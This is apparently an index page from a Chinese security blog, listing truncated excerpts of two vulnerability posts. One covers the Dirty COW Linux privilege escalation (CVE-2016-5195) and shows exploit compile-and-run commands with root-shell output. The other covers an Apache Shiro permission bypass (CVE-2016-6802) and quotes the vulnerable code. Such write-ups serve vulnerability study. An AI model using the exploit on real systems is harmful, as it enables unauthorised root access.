[提权] 脏牛漏洞 Dirty COW CVE-2016-5195 2.6.22 < 3.9 (x86/x64)

/* * (un)comment correct payload first (x86 or x64)! * * $ gcc cowroot.c -o cowroot -pthread * $ ./cowroot * DirtyCow root privilege escalation * Backing up /usr/bin/passwd.. to /tmp/bak * Size of binary: 57048 * Racing, this may take a while.. * /usr/bin/passwd is overwritten * Popping root shell. * Don’t forget to restore /tmp/bak * thread stopped * thread stopped * [email protected]:/root/cow# id * uid= […]

查看全部


Apache Shiro CVE-2016-6802 权限绕过漏洞

关于Apche shiro权限Bypass漏洞,漏洞代码段 public static String getContextPath(HttpServletRequest request) { String contextPath = (String) request.getAttribute(INCLUDE_CONTEXT_PATH_ATTRIBUTE); if (contextPath == null) { contextPath = request.getContextPath(); } if (“/”.equals(contextPath)) { // Invalid case, but happens for includes on Jetty: silently adapt it. contextPath = “”; } return decodeRequestString(re […]

查看全部